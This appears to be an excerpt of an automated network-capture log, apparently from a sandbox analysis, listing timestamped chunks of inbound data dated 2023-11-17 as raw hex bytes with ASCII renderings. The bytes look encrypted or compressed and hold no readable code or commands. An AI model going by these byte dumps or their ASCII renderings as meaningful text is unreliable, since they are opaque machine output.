                                                                                                                                                                                                2023-11-17 18:25:36 UTC195INData Raw: 3e 10 b4 ce 16 d1 67 36 7e dd ca 82 e8 cb aa a4 1d 77 a8 e2 6c 0f 49 69 ad 5e 8a 59 b2 da e7 bf bc 07 17 95 2e 67 f4 41 79 30 ec 31 85 a6 6a 77 04 0a 77 8a 5d fb 58 20 15 94 4b f9 af 45 8f 14 d2 cf 9b fc 6d 65 5f f1 5d d6 f2 d6 1e 1f a2 21 11 ac 1c 10 01 56 29 2a 65 ab b7 fe 08 6f 08 22 a2 7b c1 82 e9 2d 59 96 bc 47 bb ca 8b 9a 5b f4 15 ee 36 90 50 2f d7 f1 51 30 22 b5 78 68 30 a2 ff a4 f2 aa c6 18 3a d5 52 e0 2a 36 ed 29 3c 83 1c 0f 3c 66 e2 f0 20 9d 97 74 07 92 c2 b4 51 76 4c da dd 35 1a 0e ae cc 19 b7 03 ca 43 cb e9 db 61 8e ac ac 59 09 1c ba 06 f1 c3 7b 27 8a d4 ed cf a8 42 77 c0 9a 80 33 aa 1a ce 68 dd c9 03 38 fd 3a 8b d2 b4 b8 95 87 54 47 04 0e 13 21 ee 00 85 74 3d bb 0d b4 e8 5e c6 52 3f 30 39 bf c2 29 3e b6 8c 5b ab 9f 2b c9 94 a6 b7 bc a2 94 0e
                                                                                                                                                                                                Data Ascii: >g6~wlIi^Y.gAy01jww]X KEme_]!V)*eo"{-YG[6P/Q0"xh0:R*6)<<f tQvL5CaY{'Bw3h8:TG!t=^R?09)>[+
                                                                                                                                                                                                2023-11-17 18:25:36 UTC196INData Raw: a3 58 85 f8 a9 21 27 99 01 f6 87 11 5b 09 78 e0 cb d8 6c a2 79 83 f7 3c ee 4d a5 f7 e3 a8 c2 85 41 4e 73 91 e1 0f 63 c1 a1 7c ef 03 58 44 6e 0e 88 ce 74 1e 93 07 08 99 a5 44 a4 ae d3 c8 6f be 9e b5 cc de c3 aa d5 b8 0c bf 8a 9c 9d 86 39 42 2a 2e 61 d5 8a 65 bf 50 7b 41 13 74 39 ea 8c c6 36 e3 17 a8 62 28 ea 15 cb 84 aa da 2c ec 76 c1 22 bc 45 37 c9 43 bf b1 22 84 45 39 9c ed 77 19 6a f3 ad 51 07 cf 76 2b 1b fa 79 7e a2 7c 92 0c 59 62 41 b3 0d 05 7a 98 31 26 f5 ae f2 d9 b5 16 92 ab a0 9d 61 c5 32 92 6e ff 63 9a 57 0d e7 1c 31 41 98 4b b8 85 d9 f7 ae 75 bf 41 d0 c8 25 d4 57 3b de 80 dc a1 3f 4e 0a 0e 63 ff 57 62 34 c7 6c 67 11 fc 45 90 17 24 bb ea e8 02 04 e0 a1 19 67 c6 15 80 85 3d 09 7e 90 59 9e 73 47 ea 22 84 89 e2 57 58 ad dc 50 34 43 aa ce 95 e3 bf c8
                                                                                                                                                                                                Data Ascii: X!'[xly<MANsc|XDntDo9B*.aeP{At96b(,v"E7C"E9wjQv+y~|YbAz1&a2ncW1AKuA%W;?NcWb4lgE$g=~YsG"WXP4C
                                                                                                                                                                                                2023-11-17 18:25:36 UTC197INData Raw: 20 8b 7e 83 71 76 f5 65 ce 41 b0 7f 66 5c 8c 94 08 84 5f f4 53 a4 0f d3 18 c6 40 96 1e 6b 65 c1 c3 d6 62 a5 96 be 1f 74 d1 f0 61 42 ea 99 c4 ef bf 1f c7 3d a8 85 81 f2 31 30 df cb a8 a9 22 4f 61 59 20 15 31 4f 14 18 7b 09 88 39 65 50 1a 3d 4d cc 3b b5 66 4f ed 14 84 6f 39 9c 67 e0 3a 05 17 bb 36 ff c9 b5 2c ea 41 c9 70 0f fb ca c6 ac 34 16 ce c1 38 31 a5 d7 10 0e 14 69 39 b6 11 20 f6 10 0f 04 fd 32 fc b8 e5 51 82 86 f7 82 a2 01 d3 0a 2b 3c ec cf a4 ab d3 93 ca e0 3f e1 25 2e 85 97 9c 30 2f f2 eb 76 40 d0 16 1a 66 cf 83 7a 38 b2 13 ea 04 5f 2e 8f bb af a5 a1 e4 97 5a b3 ee 52 3e 90 72 10 85 e8 56 7a cd 83 64 37 6d fd bd 8e ab 32 b1 e9 67 9c 7b 86 fc 8f 2d 90 6f 1d 8d 26 1f 70 c6 c2 e6 67 c2 6b 90 24 54 92 b5 98 9c 74 8c 58 58 15 25 38 4a e3 5f ea 10 4c c1
                                                                                                                                                                                                Data Ascii: ~qveAf\_S@kebtaB=10"OaY 1O{9eP=M;fOo9g:6,Ap481i9 2Q+<?%.0/v@fz8_.ZR>rVzd7m2g{-o&pgk$TtXX%8J_L
                                                                                                                                                                                                2023-11-17 18:25:36 UTC198INData Raw: f2 81 27 99 7b cb c6 a1 bd d4 42 1b 83 06 8a fa 7d 8b 0d 78 5a b4 70 2d d8 41 c9 c3 1a 69 4a 59 af 5e da e2 10 3a 71 f4 7f 2b 7f 58 3a 5c cf b2 a8 02 e4 59 7c 68 d6 3a 91 40 c6 c0 71 61 a4 a0 b5 ae 95 f0 43 9e 85 c0 d7 55 bd a0 eb ad 5c c0 4b f6 cc e6 6d 9f ba 9d 93 e7 be 5b 3e 7d f1 66 5f 2c 25 85 93 ad d8 79 a0 70 c4 9e 0c 98 f3 08 c7 2f 37 5b ee e7 42 72 bb 77 c6 f0 1c 79 15 e1 73 57 d3 c4 7b e0 9f 8c 38 a8 0c f5 56 73 10 f6 f5 8e 88 3c ee 04 ff 46 0d f5 50 f7 64 13 d7 43 34 fb 5b a9 40 a8 fc 62 a9 57 24 e1 fc 65 78 ac 94 59 7e 99 5b 54 97 2c e4 15 7d 62 84 dd d1 7c 55 61 e9 39 57 3b 7b 4e e7 66 e0 ae 63 8c b3 d0 6d ee 13 9f 97 f7 f6 d4 3e 4a 58 a0 f6 01 d1 2e 20 69 53 2e fd 98 37 59 c6 28 2a 2a a5 62 f1 44 b2 5f 54 c7 0f 1c 1c 19 09 f1 80 dc 0c 33 60
                                                                                                                                                                                                Data Ascii: '{B}xZp-AiJY^:q+X:\Y|h:@qaCU\Km[>}f_,%yp/7[BrwysW{8Vs<FPdC4[@bW$exY~[T,}b|Ua9W;{Nfcm>JX. iS.7Y(**bD_T3`
                                                                                                                                                                                                2023-11-17 18:25:36 UTC200INData Raw: 97 1f 2f a4 8a 22 0a 0a 72 89 be 20 6d 19 26 8e 48 db 60 fc 28 7e 4e 01 7d a0 16 08 ca 4b b4 12 05 e5 13 78 3c 87 64 00 b5 29 f6 e2 66 04 04 fc 95 d4 54 f7 8d b3 c6 15 87 27 43 ab 96 11 93 cc 60 c2 bd 08 bf 3d 65 e5 ba 74 4b b8 23 0a 08 ed 79 7f ef b4 a1 e6 c9 09 c7 f0 1b d6 29 08 c6 35 40 42 f0 62 e2 33 99 66 f2 27 64 57 95 77 c5 c5 f1 d9 44 bf 1c 22 00 45 11 76 17 52 56 2c 8a b2 ea ac aa 0f 37 71 b3 fc e1 58 51 91 4e 40 2d 9e 2c fd 06 de ac e8 3c de 36 2f 9d 1b f7 7b 5a c8 e0 ce 05 33 cd 26 72 ab b3 11 9f 3d 78 fe a8 2d 47 fe 3e b3 d4 06 a3 16 63 c2 c7 53 63 cd 17 86 64 93 42 df 6d d5 ec 71 91 5e 86 52 cf dd 8e b6 f4 00 48 1a 38 de dd f6 57 19 66 91 29 1c d2 af fd 40 37 2f 81 c3 8c ff 67 12 82 e7 ab 43 c0 da 38 4d 09 00 94 18 d3 88 a5 6c 2e 64 1f 2c 68
                                                                                                                                                                                                Data Ascii: /"r m&H`(~N}Kx<d)fT'C`=etK#y)5@Bb3f'dWwD"EvRV,7qXQN@-,<6/{Z3&r=x-G>cScdBmq^RH8Wf)@7/gC8Ml.d,h
                                                                                                                                                                                                2023-11-17 18:25:36 UTC201INData Raw: e6 57 c5 26 3a d5 db 3f 1d 26 f6 e2 a4 08 da b3 c2 f2 d2 58 d1 99 b9 45 6f 9f 0c 60 21 4c f7 bf 2b 89 11 18 aa 70 45 63 8c 0d 3d bd 4f 93 0d b6 2d 4d 3c 88 eb 5f c8 ab 4d c1 97 8f e4 d7 55 e9 de 01 e6 8b dc 9b 9c cc c3 14 0a f0 e8 fe ec 8e 9d 09 bc 81 57 fe a0 8a 16 a0 ac d7 6f 3f 51 a9 fd 55 87 ab ba 74 0c e8 b9 41 e3 c0 32 b4 69 ed 39 81 25 54 a5 69 c8 5f ac 4b e8 50 96 63 9b e8 9f 07 5e 55 d1 5a 5f 6a 3c 97 48 75 8d 4b 89 de 27 d4 91 67 25 7c f3 48 07 67 08 57 48 5a 57 41 55 a4 bf a3 18 cb 94 4f 19 19 6b 1e ba 51 ba 7c 32 d0 84 9d 87 be 9c b4 fe b0 09 3d 7b 68 0e 1c 0b f9 91 25 d5 0c e4 8e 41 7f 00 78 a6 f0 b3 22 d5 55 86 aa 1b 44 47 0b 42 c9 b9 ae 88 39 94 35 47 22 b5 0f 68 9f 72 97 a3 5d 56 7e 32 38 15 e3 b0 03 ac 8b 42 73 29 da e8 41 41 67 65 b8 f3
                                                                                                                                                                                                Data Ascii: W&:?&XEo`!L+pEc=O-M<_MUWo?QUtA2i9%Ti_KPc^UZ_j<HuK'g%|HgWHZWAUOkQ|2={h%Ax"UDGB95G"hr]V~28Bs)AAge
                                                                                                                                                                                                2023-11-17 18:25:36 UTC202INData Raw: 4e ca 37 4a 25 a9 7b 39 bf 2e 35 6c f9 01 71 7c a1 d1 6b 54 4e b4 0f 08 f1 92 8f 37 4b 8d 0c 81 85 a7 20 6a 6f ee 9c 53 67 33 7a 87 3b a0 d5 69 08 1b dc 87 66 60 ba 8e 83 23 5d 7b b8 56 65 fd 76 07 2a 78 f9 ce 3c f4 5a c7 83 19 8d 43 10 55 fd 73 d1 2e d9 d8 01 f2 83 bb 39 8f 73 0c b7 e1 8b a0 5d 2b e5 f7 4c 2a b9 9a 51 a3 8c 15 e4 4e e0 68 5e 2e 74 52 a2 30 38 f4 33 06 b2 ec a3 44 0e ee 4b 04 06 11 3b 9d ba a9 a1 9f 99 ea 6a 96 52 c0 ea 2a c4 32 4d 74 3b 4d 54 7a 68 2d 49 9c 5d 5c 48 fa 44 3e f8 dd a8 85 f6 b4 42 dc cb 26 44 b5 5d 8f 2a 42 72 c6 dd 61 7b 97 b9 3f f1 a5 a1 0b 78 5b 3b af 66 f7 26 86 49 a1 49 93 6c ff e3 47 db 96 5d 3a 40 4d 72 63 b2 35 13 f7 68 8a fb d3 38 45 ba 82 1c 6a c0 82 45 26 26 ab 15 7c ec be 2c 70 fd a3 ea 5c 54 44 b9 e7 e0 a0 0d
                                                                                                                                                                                                Data Ascii: N7J%{9.5lq|kTN7K joSg3z;if`#]{Vev*x<ZCUs.9s]+L*QNh^.tR083DK;jR*2Mt;MTzh-I]\HD>B&D]*Bra{?x[;f&IIlG]:@Mrc5h8EjE&&|,p\TD
                                                                                                                                                                                                2023-11-17 18:25:36 UTC203INData Raw: a1 3b 02 e2 33 b2 41 63 e3 46 b1 df 52 eb 8b 37 a1 e4 18 fc 5a 2a 58 12 59 20 cb 03 d2 2f 6b aa 2b 0a 1c 2c 99 32 d4 d5 0c 32 f1 31 1c 9f 06 d8 f6 05 fe f9 47 97 a2 35 32 54 ec 2e 7d b4 9b 2b f0 cb c3 a7 ef f1 02 78 72 eb 60 99 35 82 d8 cc 90 b1 b9 af 48 a2 c4 17 00 3f 27 83 a7 85 c9 32 46 a7 4e 35 ad e0 9d 85 51 00 35 cc 60 44 8f 72 a5 9a de f9 89 86 e6 57 82 07 02 d9 4d 8c 7b f0 94 4f fb a3 01 ff ee e0 ab 30 ec e8 03 e1 f3 8c 9d 69 1a e6 8e a5 72 50 88 1d 4a 89 d1 37 c3 8a 32 de 7c 2c ec 6b 4a be b5 e6 75 23 25 10 d3 33 9d 97 5d 9b b2 12 7f 70 45 f2 8c 58 2d 39 f3 9a c9 b8 cc d6 69 bd 3e a7 4b 28 a4 52 5a 1f a9 1b 6d 96 42 70 3d f8 c1 9a 88 ac 83 4c f9 d0 78 70 23 56 3d b5 23 a1 39 13 13 c3 5b d6 2d 37 48 3a 1c 4e 3a 2d ae 72 2f fe 8a 61 c8 08 8c 5a 56
                                                                                                                                                                                                Data Ascii: ;3AcFR7Z*XY /k+,221G52T.}+xr`5H?'2FN5Q5`DrWM{O0irPJ72|,kJu#%3]pEX-9i>K(RZmBp=Lxp#V=#9[-7H:N:-r/aZV
                                                                                                                                                                                                2023-11-17 18:25:36 UTC205INData Raw: 9d 94 4d 9c 49 89 a4 38 ae 14 30 6d 40 82 2e be 34 a2 4e de 2e 86 4d ab b5 00 98 5e c3 95 03 80 05 90 a3 8d 13 77 7a 7b 63 c9 ba 73 c2 a7 40 85 e4 47 42 c5 6f 2c 92 8a d9 13 e0 1b 1a 5b 2c f8 d2 ac ee c2 c8 b4 49 5d a8 0c 1e 7d 97 c2 5d 87 67 ed 30 65 55 0a 2b 80 5a 38 ac 99 35 be ab 11 46 d4 1b f0 bd aa 90 42 bc 44 e4 c0 76 98 c3 0d 81 ea 48 a0 f9 5d 19 f3 f9 8e 9e 6d 96 bb 9b 47 35 93 97 9f eb 32 52 0b de 19 69 cc 42 24 0c 35 45 fa c9 3d 8d 80 d4 45 75 4f ed 3c f9 82 d0 82 c4 8c 9b 98 37 3a 88 ce 10 ed bd 05 c0 d5 a2 8b d0 c8 75 b1 ef 12 c3 ad a8 98 1b ba 43 bb de 02 70 d9 c8 5c 2f 10 3c fc 8c c6 d9 8a 58 f8 b3 6c 4c d3 1c a7 75 80 22 6a 41 1f 21 72 03 64 f3 34 b7 ed 87 43 09 05 29 25 47 8c 6d 71 ca 34 b8 a7 c3 4d 22 3b a3 61 3c a8 32 21 30 07 7b 39 7e
                                                                                                                                                                                                Data Ascii: MI80m@.4N.M^wz{cs@GBo,[,I]}]g0eU+Z85FBDvH]mG52RiB$5E=EuO<7:uCp\/<XlLu"jA!rd4C)%Gmq4M";a<2!0{9~
                                                                                                                                                                                                2023-11-17 18:25:36 UTC206INData Raw: a9 e6 55 e6 ed 27 0e cd 02 7b 60 d3 fe 8a e8 1f 1a 6f 5b 04 a3 06 0c 99 64 c9 0d 99 5e 0a bf c8 02 e8 e5 ca a4 37 ff 64 24 34 44 6d 0f d2 d0 11 81 4b c0 f7 68 31 e5 d3 a9 77 96 86 2d 3e 2b 65 39 f2 54 10 b5 86 70 d0 af da 65 5a 8a bd ed c7 8b 3e df 5e 1d 40 8d 4a 0c e2 ce f5 d3 42 9e 1d e8 e4 a5 83 a8 f5 d2 0a 12 4c fa da 72 0d 6a 34 cd 0f 7c fa 56 11 14 bd 84 36 63 02 c6 39 2c 5c 61 92 b1 3d 86 74 a7 a7 30 32 20 7b 8d e3 92 f4 65 1a d0 f8 3a ea 15 43 08 37 b5 23 a6 b0 4c f8 42 5f 16 27 6a c7 d8 3e 0c dc 86 ed f3 9c d2 61 9d b1 e5 f0 d2 ab 86 c5 02 4e 18 32 c3 5d 94 4a d4 ca d2 b6 2d f2 80 3d 10 f8 d8 06 6e 8c 06 20 b3 12 52 9a 17 73 ce d6 45 a7 d3 3e f3 68 cf e1 10 e3 e6 66 5d 2c c6 89 94 60 f2 0f 99 f9 b4 ce cc 8d 42 93 39 f1 fe c8 68 6d e1 b5 a9 66 34
                                                                                                                                                                                                Data Ascii: U'{`o[d^7d$4DmKh1w->+e9TpeZ>^@JBLrj4|V6c9,\a=t02 {e:C7#LB_'j>aN2]J-=n RsE>hf],`B9hmf4
                                                                                                                                                                                                2023-11-17 18:25:36 UTC207INData Raw: 42 14 50 43 aa ee a7 bd b3 87 26 e1 e5 70 32 ea 43 d5 5e 15 16 94 fb b6 e6 70 f0 d4 65 68 16 11 e4 48 c3 6a 1b 2c fc d6 d8 28 dd 8b 5c a0 42 b6 4d 69 1d ca 77 65 cb 87 29 82 03 1d f1 d4 c9 82 ca 04 b9 f9 83 f9 f1 28 c0 e8 e7 4f c4 7e 47 81 2d 24 cb 56 14 2f f6 61 f0 fc 0c b7 2f 48 aa 14 7d 32 6b d9 a0 74 df 07 c5 60 5e 4c 06 d2 cc 48 18 34 55 e7 aa a8 d3 08 cc df 64 5a 4e 9a ea 89 22 d3 4d b8 84 5f 43 40 88 b8 46 d0 ac 81 da 8f bb 63 95 9d 7d 22 60 0b 67 fe 29 52 94 6e 7a 0e 29 be 6f b0 09 13 04 f5 e6 64 05 a5 9e 23 f8 00 56 d9 5c 8d f2 a0 eb 63 43 8a 30 28 2d 8d 59 a5 45 d3 68 51 59 4a cf 5a 3d f6 87 15 8f b0 63 57 98 ea b6 da 09 2b b7 60 bf 93 89 09 27 e8 73 91 4a 77 43 22 b6 1a e0 c3 8f 99 ca 96 83 c2 37 72 ad 22 4f c6 97 02 07 c6 20 dd 7c cc df 56 f9
                                                                                                                                                                                                Data Ascii: BPC&p2C^pehHj,(\BMiwe)(O~G-$V/a/H}2kt`^LH4UdZN"M_C@Fc}"`g)Rnz)od#V\cC0(-YEhQYJZ=cW+`'sJwC"7r"O |V
                                                                                                                                                                                                2023-11-17 18:25:36 UTC208INData Raw: d2 76 82 84 1d fe 14 48 e9 bc 8c a1 30 ef 27 fa 65 76 f6 2f ff 05 ee 4c 9f 3e 78 f3 a6 04 95 5c a5 11 7a 3d 43 4f b0 71 66 76 38 b1 06 00 c5 e8 77 05 bf 2a 23 43 7e 8d 4e ac 95 90 48 81 ef 03 68 d1 60 9c 18 8c c8 a4 b1 58 06 80 5b 6f 46 dd 71 05 32 05 62 50 3d 06 bf c4 64 54 23 11 5a 46 80 37 17 f0 ad f6 bc d1 6b 8d 4f ec 47 a1 f5 6b c3 54 17 3a 7b ea d5 52 78 0e e1 6e 0c 8d 94 98 af 50 1f ee da 2a fa ed b2 e0 45 89 5b 8a 5f d3 6a 8c c3 03 15 b3 44 ea d8 92 6b 19 90 b1 e4 01 6a fd 8e 1b 16 f7 9a 36 2d 86 f8 06 38 f6 09 62 eb e7 87 ce 46 57 13 1d 01 8b 21 93 ba 46 e5 c3 5e 23 8c 90 36 f1 47 60 69 58 92 ef 55 14 f4 46 15 6d 74 f8 83 4c f7 7f 3e 18 7b f8 96 b7 98 b4 47 fd ce 26 52 7a 98 e1 b5 e6 9b 92 5a 9d d4 22 2b 60 43 a4 52 16 3e 59 8a c5 85 ff 78 f9 a6
                                                                                                                                                                                                Data Ascii: vH0'ev/L>x\z=COqfv8w*#C~NHh`X[oFq2bP=dT#ZF7kOGkT:{RxnP*E[_jDkj6-8bFW!F^#6G`iXUFmtL>{G&RzZ"+`CR>Yx
                                                                                                                                                                                                2023-11-17 18:25:36 UTC209INData Raw: 80 ad cd d2 92 3a 63 78 43 01 55 88 c0 cb 7f f8 13 e9 10 34 a2 67 3a ee 82 b7 c5 62 f7 a0 c2 16 b4 a1 6d d0 4f ad 3b d3 77 06 3e 47 f6 19 97 d7 55 37 c3 14 14 b7 b4 c8 9f a8 34 b5 cd 44 21 7a 33 55 ce bf c4 0c 20 43 9c 59 f7 a9 08 94 de 06 66 82 e2 c0 fb 51 96 02 6b 59 bd 43 c6 39 5a e1 a2 59 4b 8d 7d f0 0e d1 d7 0d 7a 47
                                                                                                                                                                                                Data Ascii: :cxCU4g:bmO;w>GU74D!z3U CYfQkYC9ZYK}zG
                                                                                                                                                                                                2023-11-17 18:25:36 UTC210INData Raw: 1c 49 55 33 38 6c 6f 3b a4 b5 e2 d9 5f 37 e4 9f 4c 6c 9b d3 7a 3f 3a d5 9b bf 4e 25 e5 bf 41 63 b4 2a bb a2 e8 55 31 d3 f2 16 85 8e 64 80 2d 87 68 f6 c2 be 0d 5d a9 a7 ea 7a 33 d0 c0 ac 30 32 81 8d e1 56 8c 0e 6a 96 56 e3 d6 9e 67 26 84 38 9a 70 6b af 3c f4 5f a1 11 8c 34 b4 35 38 ef 96 32 b7 62 e4 fc d0 b2 f3 95 01 3f 6a 08 da 3c 93 ec 25 e7 ec 79 25 bc f0 41 fa cf 02 e2 7d bc f6 d5 cd fd 0b 14 a1 7d 4f 8b 40 3a 41 7e 55 f9 a4 68 cd 02 2d 4d ac 13 be 3a b0 cb 3e b7 14 79 50 14 65 4d d8 91 04 40 b7 39 c7 a0 87 03 fc 87 9d 28 9a 70 6a 60 65 69 e1 d3 61 56 6b 6e bb cd 9d be 4b 2f ee aa a2 c3 bd 30 64 9d 34 66 f0 d5 87 72 0c 5e 80 19 a3 a7 29 92 d1 e3 85 fb 7c 6f 49 f0 41 ea dd 99 b4 a9 1b db c8 9e ff 54 cc ab 46 13 15 27 78 7f ba c1 e6 1e fd 58 22 29 d3 84
                                                                                                                                                                                                Data Ascii: IU38lo;_7Llz?:N%Ac*U1d-h]z302VjVg&8pk<_4582b?j<%y%A}}O@:A~Uh-M:>yPeM@9(pj`eiaVknK/0d4fr^)|oIATF'xX")
                                                                                                                                                                                                2023-11-17 18:25:36 UTC211INData Raw: 75 5c d1 8f af 22 c9 85 22 df fa 21 f7 40 a5 d5 1e e5 8e fa 32 4a dd 0a fc d4 74 8c 93 62 e5 34 4b c2 83 46 91 32 fa ea 00 3c 64 1e d9 8c 87 7f 62 b4 8e 3b e3 bf f2 00 28 0a b3 e8 0b 6f 8e 27 f9 ee 38 36 b7 98 f0 e4 07 ef e1 32 67 b7 cf 79 38 8d 4e 54 38 e0 fb ab 17 25 89 98 69 c0 af 88 e0 49 98 8c 98 81 8e 7e 05 7d 7c 0f c8 40 ea 74 71 37 44 7b 1e 14 e7 5a b4 63 6d ed 31 a3 63 e9 2d 75 4b dc 5b d9 46 8d 40 80 ad 15 78 6b 70 25 ed fe 2d b5 e6 70 c6 96 5f 01 4f 02 64 9c 8d 69 71 e5 4b a6 14 e9 20 d6 2d 13 d1 b7 02 19 d2 7e 1c a8 59 6f 98 62 9c c1 71 71 06 5e 99 96 43 f1 16 91 5d be af 5a a0 02 29 0c 19 e2 73 8b 38 85 13 e9 68 bb a8 d4 8e 5f ee ff 75 e4 11 d0 a1 1b 03 34 de 23 fb 81 aa 90 9b 9c 6f e3 53 b7 71 ac ad 8e 21 c0 15 2d 1f 73 3c 2f 03 8a cc f7 1f
                                                                                                                                                                                                Data Ascii: u\""!@2Jtb4KF2<db;(o'862gy8NT8%iI~}|@tq7D{Zcm1c-uK[F@xkp%-p_OdiqK -~Yobqq^C]Z)s8h_u4#oSq!-s</
                                                                                                                                                                                                2023-11-17 18:25:36 UTC212INData Raw: 62 fb b7 70 f4 8e 1c 93 8f 74 19 c3 c6 52 7a 2f 75 25 46 cb a2 32 f9 81 af c8 44 1a 77 b7 4e 8f 07 ef b9 fa c3 76 6e f2 d0 5f ef 0a 48 fe 99 e6 0f 15 dc 3b 75 13 58 02 e2 e8 8c 35 50 84 61 ed a6 49 71 65 2f 2c 1e 04 3c a7 fa 8e 12 1f 76 ee 83 4a 23 8c 4d 4d 08 ba 64 c0 ff 50 59 74 1c d6 55 9d 3c c9 c8 6d 52 02 1d d6 08 61 b2 59 b7 0c 8e 6c e4 c3 8e 5b 25 ce 0e c4 44 37 82 54 bb 1f c3 d8 0b e1 71 97 8a 15 b4 02 7d 8b ff 51 c8 6e 1f 8a df 3f 99 81 7d 71 3b 0d 05 ad 13 d2 89 86 f8 1a b2 5a 98 70 b0 ef 14 31 ba 0e d5 c1 61 56 ae 9c 8a fc 46 14 22 2f a6 c3 48 6d 7b 99 ea b3 f4 4c e7 ce cc 9d ba 2b 22 22 3d 16 40 10 f2 fd 27 3b db e1 b1 83 66 b5 e9 72 94 d0 cb 2a bb e2 66 6c 55 9a 8a 96 f1 57 0d de d9 64 75 35 b8 87 c3 ff 92 7a 9d d5 43 6b 0b d6 db 9f 24 19 a6
                                                                                                                                                                                                Data Ascii: bptRz/u%F2DwNvn_H;uX5PaIqe/,<vJ#MMdPYtU<mRaYl[%D7Tq}Qn?}q;Zp1aVF"/Hm{L+""=@';fr*flUWdu5zCk$
                                                                                                                                                                                                2023-11-17 18:25:36 UTC213INData Raw: 61 a2 cb fd 92 e8 e8 35 8b bf 03 ce d1 ff 0d 6b 87 7d 35 f4 44 77 aa 57 b2 43 9e 8b fa 61 bf 11 1c 50 7c 0c ad b7 9e 79 c3 ad 48 66 e9 21 e2 69 b5 e5 7d aa 8e e5 d0 8c 83 b0 aa 68 b5 e8 b0 00 4a c0 6f 94 a7 24 60 8e ff 87 46 37 5b 60 aa 55 a0 6e 38 be 7f 0b 07 12 f5 03 eb 94 7c c7 a4 31 64 7b 4e 6b 51 43 8b cb 96 69 67 df 11 99 fd 6c ea 98 7b 41 3d 88 60 b4 06 4c 3e 99 37 f5 56 38 b9 cf 2e c4 b9 cb 0b e4 cc 65 f1 71 fb 26 86 9f 5c e1 53 e8 73 a0 5f 98 1f 3f 87 a6 9c b2 e8 3d e9 a9 b2 f8 4e f6 d1 04 4f 3d 15 82 dd dd ed 10 cc d0 b1 8d b1 e7 c6 f2 6f 5c 7b de 39 00 ec f5 ea 9d fb 64 4f a5 e8 09 a0 86 0c b8 84 83 98 08 52 02 7f e0 2f a7 6a c3 9b 0c db 52 0f 52 84 f8 ce b6 f6 ca 15 8f 20 d0 26 be be 05 f4 e1 c8 84 d0 5b 9e 7e 9e 15 de 8d b2 2f 3f 09 15 a9 37
                                                                                                                                                                                                Data Ascii: a5k}5DwWCaP|yHf!i}hJo$`F7[`Un8|1d{NkQCigl{A=`L>7V8.eq&\Ss_?=NO=o\{9dOR/jRR &[~/?7
                                                                                                                                                                                                2023-11-17 18:25:36 UTC214INData Raw: 9d cb bb 7e 6d 48 e1 88 88 b1 ff ff 76 5e de a2 d6 64 1b 48 c3 01 e6 9a 8d 60 f6 50 f5 94 69 48 00 62 91 aa 97 fc 8e 7a 64 e8 42 0b bd 87 ed bb 60 83 78 f5 e5 98 9f e3 6a c4 c4 41 0f 73 60 d5 25 41 55 bf df a1 f3 35 78 a7 4f 30 e8 0c 37 d3 97 00 4b a9 b5 7a 3e fc 7b 71 5d 8a 77 09 24 c7 59 af 3f 36 11 b1 00 6f 1f e5 2c ae 27 b8 87 88 ab 14 fc b8 72 8a e2 1a ab 43 62 03 fc d4 d7 31 49 14 0b 0c 3f d5 ba fc 48 b1 67 95 38 10 f6 c7 72 d0 81 7a a3 57 7f 19 09 0d bc e0 62 5e c9 2b 2e 76 e3 d7 6c ee 8d 8b dc d2 36 d5 07 68 6c 3e 9b 7c 43 b9 4e cb b5 a4 13 15 12 93 41 64 dd 43 2e 88 e0 17 59 d0 fa bb 26 de 3b f9 c3 4f df 4b 18 a0 76 d2 6e 46 07 6a 62 9a ce cf 3a b8 e1 73 3e b2 c4 74 87 33 0b 2a cc 49 df fa db 8c 33 04 1e 13 24 fe 61 2e b6 15 01 be 88 8d 90 d4 04
                                                                                                                                                                                                Data Ascii: ~mHv^dH`PiHbzdB`xjAs`%AU5xO07Kz>{q]w$Y?6o,'rCb1I?Hg8rzWb^+.vl6hl>|CNAdC.Y&;OKvnFjb:s>t3*I3$a.
                                                                                                                                                                                                2023-11-17 18:25:36 UTC216INData Raw: 56 4c 96 0c 9e ca 95 9e a2 95 1e 0c fc e6 24 2b 39 91 de 23 4d 00 e3 bc 2a d1 a7 d3 0f 3f b1 5c f1 9e ff 86 03 d9 00 a0 b6 7c d4 01 de 92 72 b0 74 d6 84 c0 de dd b3 c1 d0 18 a7 a1 38 d6 1c 79 4d 61 d6 3e 8d 21 ee 90 6f 13 fa 82 db be 67 ac 30 fb 73 09 79 ff df 2f 1c 88 5b 3a 80 8d 1f 3e dd 17 81 9d 23 f5 4f 36 e0 3a b1 30 6f 54 75 4b ea fc dd 39 69 4b cf e5 d6 b7 25 79 99 41 4f 85 dd ab 49 23 08 bc 0d 3e 91 3a 95 b3 30 d5 bf 7a bd 5d 8b c6 ef e0 b1 f3 ef 22 76 cb b9 71 e8 ec 1d 89 37 f2 de 0a f0 61 49 15 53 85 c8 e9 93 92 64 b2 12 19 dc 7c 25 38 13 8a 4e 3e d6 8b d4 65 91 b3 85 42 08 a9 50 4c c7 ed 3c 39 4b 9d e2 68 0d 80 03 de ba db 48 25 09 6f cc 2e 35 1f db 4f 72 e0 51 81 ed 58 aa 72 89 72 4c 1e 6b 5d 63 bb cc fd 61 83 d9 1f a0 69 73 83 af 1c 04 6f 5c
                                                                                                                                                                                                Data Ascii: VL$+9#M*?\|rt8yMa>!og0sy/[:>#O6:0oTuK9iK%yAOI#>:0z]"vq7aISd|%8N>eBPL<9KhH%o.5OrQXrrLk]caiso\
                                                                                                                                                                                                2023-11-17 18:25:36 UTC217INData Raw: 59 5b dc 1e dd 0d a1 a3 e3 42 86 85 bf 4f e4 f1 15 93 e0 a6 40 dc 1a 59 3f 38 03 49 ad 60 a8 48 12 92 ac a3 45 14 32 35 9c 69 88 6a de 8e 5f 3c f5 f6 3e a0 a4 b9 5f 40 77 f6 8a cd bc 23 23 23 41 84 c0 ed db 87 85 01 a2 52 11 d9 c5 31 32 93 2e a3 e8 c5 1e d7 18 9b 8f c6 23 9a 06 f1 d2 82 97 ea cc d1 e1 50 9e d4 d9 2c 75 a7 b6 54 c1 5b 9a af 68 93 34 90 5d 32 72 3d 55 f6 f8 37 e8 c4 7b 99 88 11 c7 ef fe 5a 71 ea 42 17 0d f7 15 fa c2 d4 76 1a 39 da 43 98 d5 d2 9b 01 3d 2f d1 d6 ff ee f0 ec 8b e9 13 cf ba 0a 7b fe 9e 25 05 8e ec 4b a4 e9 25 d4 2f 0c 1e bc aa 98 e5 6c 47 c9 12 04 34 23 c1 6e 5a af 0a 54 8f 0b c0 d4 50 77 e7 05 5a 41 46 19 d1 3e 4c 01 4d 1b 89 a8 da 6a bf d3 b3 47 40 67 f6 00 5e d0 2f 1f e8 a8 00 27 05 9d 21 50 fb 17 01 c0 91 1f e5 e5 09 c8 36
